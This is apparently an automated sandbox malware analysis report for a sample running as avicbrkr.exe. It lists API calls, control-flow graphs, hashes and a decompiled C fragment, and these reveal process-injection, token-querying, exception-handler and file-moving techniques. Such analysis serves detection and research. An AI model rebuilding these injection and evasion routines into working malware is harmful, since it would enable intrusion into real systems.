                      • Opcode Fuzzy Hash: 1d6f1699cd2a41501ac06ffdfb99ec79583acf338987c4604ab8fda2320a4dc8
                      • Instruction Fuzzy Hash: 2511B471901229BBDB21ABE5DC45EDFBFBDEF49B50F110022F708A2124D2B15905CBE1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0141493A, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01414958
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,01412BAA,0141763C,00000000,00000000,?,00000000,0141306A,?,?), ref: 01414968
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 01414994
                      • GetLastError.KERNEL32(?,?,01412BAA,0141763C,00000000,00000000,?,00000000,0141306A,?,?), ref: 014149B9
                      • CloseHandle.KERNEL32(000000FF), ref: 014149CA
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Heap$AllocateCloseCreateErrorFreeHandleLastReadSize
                      • String ID:
                      • API String ID: 3493789272-0
                      • Opcode ID: b99df490942ed271e9205e883bf5cb8e1fe80e9603afa55dadeef939c9c1dc02
                      • Instruction ID: 2762cd1761b156a38a80a8c71264729638699b53dc793e5f57eb11b9cdfb8601
                      • Opcode Fuzzy Hash: b99df490942ed271e9205e883bf5cb8e1fe80e9603afa55dadeef939c9c1dc02
                      • Instruction Fuzzy Hash: B611D6B2110214BFDB215F79CC88EAF7FAAEB05360F194627FA1597274D7709D4187A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01412102, Relevance: 6.1, APIs: 4, Instructions: 107threadsynchronizationinjectionCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 01412130
                        • Part of subcall function 01411F7B: memset.NTDLL ref: 01411FB7
                      • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 014121BA
                      • WaitForSingleObject.KERNEL32(00000064), ref: 014121C8
                      • SuspendThread.KERNEL32(?), ref: 014121DB
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411D5F
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411DB0
                        • Part of subcall function 01411C29: memcpy.NTDLL(?,01412486,00000800,?,?,?,00000000), ref: 01411E20
                        • Part of subcall function 01411C29: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01411E4B
                        • Part of subcall function 01411C29: RtlNtStatusToDosError.NTDLL(00000000), ref: 01411E52
                        • Part of subcall function 01411C29: CloseHandle.KERNEL32(00000000), ref: 01411E61
                        • Part of subcall function 01411C29: memset.NTDLL ref: 01411E75
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: memcpymemset$Thread$CloseErrorHandleObjectResumeSectionSingleStatusSuspendUnmapViewWait
                      • String ID:
                      • API String ID: 398184711-0
                      • Opcode ID: 7429b5367e495f30b373af6f3bc42dcb3e2f3bd3926a845ce2f39d86c92b47f0
                      • Instruction ID: 9e6d15661e44ad383eba4bc32ee4cbfc59bdffbec527de130ef4ecf053351179
                      • Opcode Fuzzy Hash: 7429b5367e495f30b373af6f3bc42dcb3e2f3bd3926a845ce2f39d86c92b47f0
                      • Instruction Fuzzy Hash: E6316C71104302AFE721DF54D840EABBBE9BB98350F14492EFA94D2278D771D964CB52
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 014141F8, Relevance: 6.0, APIs: 4, Instructions: 32memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(00000000,?,?,01413030,00000000,?), ref: 0141420B
                      • lstrlen.KERNEL32(01413030,?,01413030,00000000,?), ref: 01414216
                      • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0141422B
                      • wsprintfW.USER32 ref: 01414243
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: lstrlen$AllocateHeapwsprintf
                      • String ID:
                      • API String ID: 2281473501-0
                      • Opcode ID: 7ed672baa5800d2c3b8348b3741d570b34d12a075061b65732c048cfb59737c7
                      • Instruction ID: 9d6bfcb124018efe1fede0a6c2a8ef891219d0318d812218fedf8f2e96140b89
                      • Opcode Fuzzy Hash: 7ed672baa5800d2c3b8348b3741d570b34d12a075061b65732c048cfb59737c7
                      • Instruction Fuzzy Hash: 7CF05432541224BBCB226F99DC049DB7F65EB05791B0A8126FE0997229D771D950CBC0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413633, Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 01413659
                      • memcpy.NTDLL ref: 01413681
                        • Part of subcall function 01413D34: NtAllocateVirtualMemory.NTDLL(014137D3,00000000,00000000,014137D3,00003000,00000040), ref: 01413D65
                        • Part of subcall function 01413D34: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413D6C
                        • Part of subcall function 01413D34: SetLastError.KERNEL32(00000000), ref: 01413D73
                      • GetLastError.KERNEL32(00000010,00000218,01414E3D,00000100,?,00000318,00000008), ref: 01413698
                        • Part of subcall function 01413CF3: NtWriteVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,014160F0,?,014119D6,?,00000004,0141244E,00000004,?), ref: 01413D11
                        • Part of subcall function 01413CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413D20
                        • Part of subcall function 01413CF3: SetLastError.KERNEL32(00000000,?,014119D6,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000), ref: 01413D27
                      • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,01414E3D,00000100), ref: 0141377B
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$Last$MemoryStatusVirtual$AllocateWritememcpymemset
                      • String ID:
                      • API String ID: 397557795-0
                      • Opcode ID: 0dd1f1c876c167022c228dfd3f9731e9ea55e52509213e661a9563266221c1e2
                      • Instruction ID: bab5bb315a27cde93cc63c2bebef7224b330771c699d3efc3d130abd21f245ba
                      • Opcode Fuzzy Hash: 0dd1f1c876c167022c228dfd3f9731e9ea55e52509213e661a9563266221c1e2
                      • Instruction Fuzzy Hash: C64183B1504302AFD721DF29DC41F9BBBF9BBA8320F00892EF599C6264E770D5158B62
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Analysis Process: avicbrkr.exe PID: 3824 Parent PID: 3000 avicbrkr.exeCOMMON

                      Executed Functions

                      Function 0037DCD8, Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 176 37dcd8-37dd0e call 395b55 179 37dd10-37dd1e StrRChrA 176->179 180 37dd4a-37dd74 call 38a02c 176->180 181 37dd23 179->181 182 37dd20-37dd21 179->182 187 37dd76-37dd7a 180->187 188 37dd92-37dd9a 180->188 184 37dd29-37dd44 _strupr lstrlen call 38215f 181->184 182->184 184->180 187->188 190 37dd7c-37dd87 187->190 191 37dda1-37ddbf CreateEventA 188->191 192 37dd9c-37dd9f 188->192 190->188 195 37dd89-37dd90 190->195 193 37ddf3-37ddf9 GetLastError 191->193 194 37ddc1-37ddc8 call 37d50a 191->194 196 37ddff-37de06 192->196 198 37ddfb-37ddfd 193->198 194->193 202 37ddca-37ddd1 194->202 195->188 195->195 199 37de15-37de1a 196->199 200 37de08-37de0f RtlRemoveVectoredExceptionHandler 196->200 198->196 198->199 200->199 203 37dde4-37dde7 call 37d7ee 202->203 204 37ddd3-37dddf RtlAddVectoredExceptionHandler 202->204 206 37ddec-37ddf1 203->206 204->203 206->193 206->198
                      APIs
                      • StrRChrA.SHLWAPI(0039D298,00000000,0000005C), ref: 0037DD14
                      • _strupr.NTDLL ref: 0037DD2A
                      • lstrlen.KERNEL32(0039D298), ref: 0037DD32
                        • Part of subcall function 0038A02C: NtOpenProcess.NTDLL(?,00000400,?,0039D2DC), ref: 0038A073
                        • Part of subcall function 0038A02C: NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0038A086
                        • Part of subcall function 0038A02C: NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?,00000000), ref: 0038A0A2
                        • Part of subcall function 0038A02C: NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?,?), ref: 0038A0BF
                        • Part of subcall function 0038A02C: memcpy.NTDLL(00000000,00000000,0000001C), ref: 0038A0CC
                        • Part of subcall function 0038A02C: NtClose.NTDLL(?), ref: 0038A0DE
                        • Part of subcall function 0038A02C: NtClose.NTDLL(?), ref: 0038A0E8
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,0039E605,00000001,0039D2DC,00000000), ref: 0037DDB2
                      • RtlAddVectoredExceptionHandler.NTDLL(00000000,0037D30B), ref: 0037DDD9
                        • Part of subcall function 0037D7EE: memset.NTDLL ref: 0037D836
                        • Part of subcall function 0037D7EE: CreateMutexA.KERNEL32(00000000,00000001,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D86F
                        • Part of subcall function 0037D7EE: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D87A
                        • Part of subcall function 0037D7EE: CloseHandle.KERNEL32(0039D260), ref: 0037D892
                        • Part of subcall function 0037D7EE: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037D8EA
                        • Part of subcall function 0037D7EE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0037D92F
                        • Part of subcall function 0037D7EE: OpenProcess.KERNEL32(00000400,00000000,00000000,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D944
                        • Part of subcall function 0037D7EE: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D94E
                        • Part of subcall function 0037D7EE: CloseHandle.KERNEL32(00000000), ref: 0037D95C
                        • Part of subcall function 0037D7EE: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0037D9E9
                        • Part of subcall function 0037D7EE: LoadLibraryA.KERNEL32(0039E000), ref: 0037DA84
                        • Part of subcall function 0037D7EE: RtlAllocateHeap.NTDLL(00000000,00000043), ref: 0037DAFD
                        • Part of subcall function 0037D7EE: wsprintfA.USER32 ref: 0037DB25
                      • GetLastError.KERNEL32(?,0039E605,00000001,0039D2DC,00000000), ref: 0037DDF3
                      • RtlRemoveVectoredExceptionHandler.NTDLL(0039D264), ref: 0037DE09
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseProcess$AllocateErrorHeapInformationLastOpenQueryToken$CreateExceptionHandleHandlerVectored$EventLibraryLoadMutexRemove_struprlstrlenmemcpymemsetwsprintf
                      • String ID:
                      • API String ID: 3267585064-0
                      • Opcode ID: a3fdb3ca14ae9819b4cafed1f3842ec6d543b40a4885a312f17c740e27209595
                      • Instruction ID: 31f2f900677d168d38ee992cc22f9364883db57e83dcd49850555a087b2990c6
                      • Opcode Fuzzy Hash: a3fdb3ca14ae9819b4cafed1f3842ec6d543b40a4885a312f17c740e27209595
                      • Instruction Fuzzy Hash: 0531D4729042119FDB336F74AC86A6E7BBCEF04310F06492BE995DB1A1D77ACC818790
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038A02C, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • NtOpenProcess.NTDLL(?,00000400,?,0039D2DC), ref: 0038A073
                      • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0038A086
                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?,00000000), ref: 0038A0A2
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?,?), ref: 0038A0BF
                      • memcpy.NTDLL(00000000,00000000,0000001C), ref: 0038A0CC
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • NtClose.NTDLL(?), ref: 0038A0DE
                      • NtClose.NTDLL(?), ref: 0038A0E8
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Token$CloseHeapInformationOpenProcessQuery$AllocateFreememcpy
                      • String ID:
                      • API String ID: 2354801525-0
                      • Opcode ID: e9986be11a0d1d0bd03d2fd2896533865678ec21f189fe13ffab3d5abda333ea
                      • Instruction ID: b02e9cd9de7d67ebfcd8194ae6651c308d97f2ab63f347bdb95b489371704582
                      • Opcode Fuzzy Hash: e9986be11a0d1d0bd03d2fd2896533865678ec21f189fe13ffab3d5abda333ea
                      • Instruction Fuzzy Hash: 5C2116B2910218BBDF12AFA4CC459DEBFBDEF08740F108466F904EA160D7729A449BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003A3040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 225nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 003A31DF
                      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 003A324A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217114277.003A3000.00000040.sdmp, Offset: 003A3000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_3a3000_avicbrkr.jbxd
                      Similarity
                      • API ID: MemoryProtectVirtual
                      • String ID: z
                      • API String ID: 2706961497-1657960367
                      • Opcode ID: ddf782b6d27c912e9975ef9c215edfa69c5d14100a0496b08ad2c99292f13ca3
                      • Instruction ID: 129b7fc92b16285fff015f350fb3040d803ab117c1780267222f310baf292ed3
                      • Opcode Fuzzy Hash: ddf782b6d27c912e9975ef9c215edfa69c5d14100a0496b08ad2c99292f13ca3
                      • Instruction Fuzzy Hash: 5D819172900209DFCB16CF99C880AAEF7B9FF86304F25855EE556DB251E730EA45CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038885B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,H}*), ref: 00388872
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: InformationProcessQuery
                      • String ID: H}*
                      • API String ID: 1778838933-3236088583
                      • Opcode ID: b1bb59feea27c5376510d45072141a0260718e18003b6b2f8b744951a913df83
                      • Instruction ID: cc46f189b979563babeb43e1d0d3f22d64747b411a6452500091669a9b01c797
                      • Opcode Fuzzy Hash: b1bb59feea27c5376510d45072141a0260718e18003b6b2f8b744951a913df83
                      • Instruction Fuzzy Hash: 5AF05E317102159BC721EF55CC85D9BBBACEB41750BD54595E900DB2A1D730ED06CBE1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0063168A, Relevance: 24.2, APIs: 16, Instructions: 238timesleepfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 63168a-6316b4 call 6329a4 3 631985-63198b 0->3 4 6316ba-6316c9 0->4 5 631994-63199c 3->5 6 63198d-63198e ExitProcess 3->6 8 6316ca-6316da WaitForSingleObject 4->8 9 631705-631707 8->9 10 6316dc-6316f9 call 634365 8->10 9->3 11 63170d-63171a call 633223 9->11 16 6316fe-631703 10->16 17 63172e-631733 11->17 18 63171c-631726 11->18 16->8 16->9 19 631741 call 632a10 17->19 20 631735-63173f call 631574 17->20 18->17 24 631746-63174c 19->24 20->24 25 631767-63176d 24->25 26 63174e-631761 call 6315fb 24->26 28 631786-6317a5 call 63144f call 632b45 25->28 29 63176f-63177c 25->29 26->25 33 631978-63197b 26->33 38 6317a7-6317b9 call 632b45 28->38 39 6317bf-6317d2 call 633d84 28->39 29->28 31 63177e 29->31 31->28 33->3 35 63197d-631983 GetLastError 33->35 35->3 38->35 38->39 39->33 44 6317d8-6317df call 631189 39->44 44->3 47 6317e5-6317e9 44->47 48 6317f2 47->48 49 6317eb-6317f0 47->49 50 6317f7-631809 lstrcatW 48->50 49->50 51 631814-631820 call 633e06 50->51 52 63180b-631812 call 631227 50->52 57 63185b-631866 call 63131a 51->57 58 631822-63182a 51->58 52->51 52->57 64 631868-63186a 57->64 65 63186c-6318a7 call 634f04 CreateEventA 57->65 58->57 59 63182c-631832 58->59 61 631834-631848 call 632cdf 59->61 62 63184a-631853 call 632d8c 59->62 61->57 61->62 68 631855-631856 62->68 64->68 73 6318d3-6318f6 call 634253 65->73 74 6318a9-6318b1 GetLastError 65->74 68->3 79 6318f8-6318fa 73->79 80 63191f-63192d call 633c1b 73->80 75 6318b3-6318c6 SetEvent Sleep ResetEvent 74->75 76 6318cc-6318cd CloseHandle 74->76 75->76 76->73 81 63196c-631976 LocalFree 79->81 82 6318fc-631903 79->82 80->33 86 63192f-631946 CreateWaitableTimerA 80->86 81->33 82->80 85 631905-63190e DeleteFileW 82->85 85->80 87 631910-631919 MoveFileExW 85->87 86->81 88 631948-631966 SetWaitableTimer CloseHandle 86->88 87->80 88->81
                      APIs
                        • Part of subcall function 006329A4: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00637614,006316B0,?,00637614), ref: 006329B3
                        • Part of subcall function 006329A4: GetVersion.KERNEL32(?,00637614), ref: 006329C2
                        • Part of subcall function 006329A4: GetCurrentProcessId.KERNEL32(?,00637614), ref: 006329D1
                        • Part of subcall function 006329A4: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00637614), ref: 006329EA
                      • WaitForSingleObject.KERNEL32(00000040), ref: 006316D2
                        • Part of subcall function 00633223: OpenProcess.KERNEL32(00000400,00000000,00637614,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063323E
                        • Part of subcall function 00633223: IsWow64Process.KERNEL32(00637624,?,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063324F
                        • Part of subcall function 00633223: CloseHandle.KERNEL32(00637624), ref: 00633262
                      • CloseHandle.KERNEL32(00000000), ref: 00631966
                        • Part of subcall function 006315FB: CreateFileW.KERNEL32(0063763C,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00631611
                        • Part of subcall function 006315FB: CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,00637614), ref: 00631627
                        • Part of subcall function 006315FB: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,00637614), ref: 0063163F
                        • Part of subcall function 006315FB: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,00637614), ref: 00631651
                        • Part of subcall function 006315FB: GetLastError.KERNEL32(?,00000000,?,00637614), ref: 0063165F
                        • Part of subcall function 006315FB: GetLastError.KERNEL32(?,00000000,?,00637614), ref: 0063166C
                        • Part of subcall function 006315FB: GetLastError.KERNEL32(?,00637614), ref: 0063167B
                        • Part of subcall function 0063144F: LoadLibraryA.KERNEL32(00638019), ref: 0063145E
                        • Part of subcall function 0063144F: GetModuleHandleA.KERNEL32(00638019,00638000,?,?,0063178B,00000000,?,00637614), ref: 00631484
                      • GetLastError.KERNEL32(00637678,00000000,?,00637614), ref: 0063197D
                        • Part of subcall function 00631189: HeapFree.KERNEL32(00000000,?,006381D0), ref: 0063121A
                      • lstrcatW.KERNEL32(006384B8,00637678), ref: 006317FD
                      • LocalFree.KERNEL32(?), ref: 00631970
                        • Part of subcall function 00631227: PathFindFileNameW.SHLWAPI(0063618C), ref: 00631249
                        • Part of subcall function 00631227: lstrcmpiW.KERNEL32(00000000,?,00637614), ref: 00631250
                        • Part of subcall function 00631227: RegOpenKeyExA.ADVAPI32(80000001,00638080,00000000,00000000,?,?,00637614), ref: 00631281
                        • Part of subcall function 00631227: lstrlenW.KERNEL32(?,00637614), ref: 00631295
                        • Part of subcall function 00631227: RtlAllocateHeap.NTDLL(00000000,?), ref: 006312AD
                        • Part of subcall function 00631227: RegQueryValueExW.ADVAPI32(?,00000000,00637614,00000000,00637614,?,00637614), ref: 006312CC
                        • Part of subcall function 00631227: StrStrIW.SHLWAPI(00000000), ref: 006312E9
                        • Part of subcall function 00631227: HeapFree.KERNEL32(00000000,00000000), ref: 006312FE
                        • Part of subcall function 00631227: RegCloseKey.ADVAPI32(?,?,00637614), ref: 00631307
                        • Part of subcall function 00633E06: OpenProcessToken.ADVAPI32(000000FF,00020008,00637614,00000000), ref: 00633E38
                        • Part of subcall function 00633E06: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00633E93
                        • Part of subcall function 00633E06: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00633EA3
                        • Part of subcall function 00633E06: CloseHandle.KERNEL32(00637614), ref: 00633EB8
                        • Part of subcall function 00632D8C: memset.NTDLL ref: 00632DAA
                        • Part of subcall function 00632D8C: CoInitializeEx.OLE32(00000000,00000002), ref: 00632DB5
                        • Part of subcall function 00632D8C: PathFindExtensionW.SHLWAPI(00000000), ref: 00632DD0
                        • Part of subcall function 00632D8C: lstrcpyW.KERNEL32(00000000,00638224), ref: 00632DE5
                        • Part of subcall function 00632D8C: lstrlen.KERNEL32(00637614,?,?,?,?,?,?,?,?,?,?,00631853,?), ref: 00632E02
                        • Part of subcall function 00632D8C: lstrcpyW.KERNEL32(00000000,006384B8), ref: 00632E33
                        • Part of subcall function 00632D8C: wsprintfW.USER32 ref: 00632E6A
                        • Part of subcall function 00632D8C: ShellExecuteExW.SHELL32(0000003C), ref: 00632E9F
                        • Part of subcall function 00632D8C: CoUninitialize.OLE32 ref: 00632EB3
                        • Part of subcall function 00632CDF: lstrlenW.KERNEL32(00000000,00000000,00637614,?,00001FD1,00000000,00000000,?,?,00631841,?,?), ref: 00632D1A
                        • Part of subcall function 00632CDF: PathFindFileNameW.SHLWAPI(00000000), ref: 00632D32
                        • Part of subcall function 00632CDF: lstrcatW.KERNEL32(00000000,?), ref: 00632D5B
                        • Part of subcall function 0063131A: memset.NTDLL ref: 00631323
                        • Part of subcall function 0063131A: HeapFree.KERNEL32(00000000,?,?), ref: 00631392
                      • CreateEventA.KERNEL32(?,00000001,00000000), ref: 00631898
                      • GetLastError.KERNEL32 ref: 006318A9
                      • SetEvent.KERNEL32(00000000), ref: 006318B4
                      • Sleep.KERNEL32(00000BB8), ref: 006318BF
                      • ResetEvent.KERNEL32(00000000), ref: 006318C6
                      • CloseHandle.KERNEL32(00000000), ref: 006318CD
                        • Part of subcall function 00634253: RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,?,00000001,00000000,000000B7,00000001,?,00000000,?,?,00637614), ref: 0063427A
                        • Part of subcall function 00634253: RegEnumKeyExA.ADVAPI32(00000000,?,00000000,00637614,00000000,00000000,00000000,00000000,00000104,00000000,?,00637614), ref: 006342C1
                        • Part of subcall function 00634253: WaitForSingleObject.KERNEL32(00000000,?), ref: 0063432E
                        • Part of subcall function 00634253: RegCloseKey.ADVAPI32(?,00000104,00000000,?,00637614), ref: 00634356
                      • DeleteFileW.KERNEL32(0063763C,?), ref: 00631906
                      • MoveFileExW.KERNEL32(00000000,00000004), ref: 00631919
                        • Part of subcall function 00633C1B: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 00633C4C
                        • Part of subcall function 00633C1B: RtlNtStatusToDosError.NTDLL(C000009A), ref: 00633C85
                      • CreateWaitableTimerA.KERNEL32(?,00000001,?), ref: 0063193C
                      • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0063195F
                        • Part of subcall function 00634365: lstrcpyn.KERNEL32(006316FE,006361F4,00000008,0063618C,0000000C,00000000,?,?,?,006316FE,?,?,00637614), ref: 00634393
                        • Part of subcall function 00634365: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,006316FE,?,?,00637614), ref: 00634406
                        • Part of subcall function 00634365: memcpy.NTDLL(?,00000000,?,?,00637614,00000001,?,?,?,006316FE,?,?,00637614), ref: 0063444F
                        • Part of subcall function 00634365: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00637614,00000001,?,?,?,006316FE,?), ref: 00634468
                      • ExitProcess.KERNEL32 ref: 0063198E
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$CloseErrorProcess$CreateFreeHandleLastOpen$EventHeap$FindPathlstrlen$AuthorityNameObjectQuerySingleTimerVirtualWaitWaitablelstrcatlstrcpymemset$AllocAllocateCountCurrentDeleteEnumExecuteExitExtensionInformationInitializeLibraryLoadLocalMappingModuleMoveResetShellSizeSleepStatusSystemTokenUninitializeValueVersionViewWow64lstrcmpilstrcpynmemcpywsprintf
                      • String ID:
                      • API String ID: 2996900253-0
                      • Opcode ID: 4a79d4b2d838a23f793b5b1292191984090d1f2ce89031a1e5c32b055d424281
                      • Instruction ID: d55ea1e530be0c58699f32852acf15459902918dac3998080f27c11317db8e77
                      • Opcode Fuzzy Hash: 4a79d4b2d838a23f793b5b1292191984090d1f2ce89031a1e5c32b055d424281
                      • Instruction Fuzzy Hash: 1381C2B2504315AFDB20AF74DD86AAAB7FBAB46314F04592DF641DB2A0DB30C844CBD5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401649, Relevance: 16.6, APIs: 11, Instructions: 85threadsynchronizationCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E00401649(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x403268 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E004015A3( &_v28); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}












                      0x00401657
                      0x0040165f
                      0x00401674
                      0x0040167e
                      0x00401680
                      0x00401685
                      0x00401723
                      0x0040168b
                      0x0040169c
                      0x0040169e
                      0x004016a0
                      0x004016a5
                      0x0040170e
                      0x004016a7
                      0x004016b0
                      0x004016b3
                      0x004016c4
                      0x004016f7
                      0x004016cb
                      0x004016d0
                      0x004016dd
                      0x004016e7
                      0x004016ec
                      0x004016ec
                      0x004016dd
                      0x00401700
                      0x00401700
                      0x00401714
                      0x0040171a
                      0x0040172c

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,00401034,?,00000000,?), ref: 0040167E
                      • CreateThread.KERNELBASE(00000000,00000000,004010FB,?,00000000,?), ref: 0040169C
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016B3
                      • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016C0
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016D0
                      • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016D9
                        • Part of subcall function 004015A3: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,752AC470,004016EC,?,?,00000000), ref: 004015C9
                      • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016F7
                      • CloseHandle.KERNEL32(?), ref: 00401700
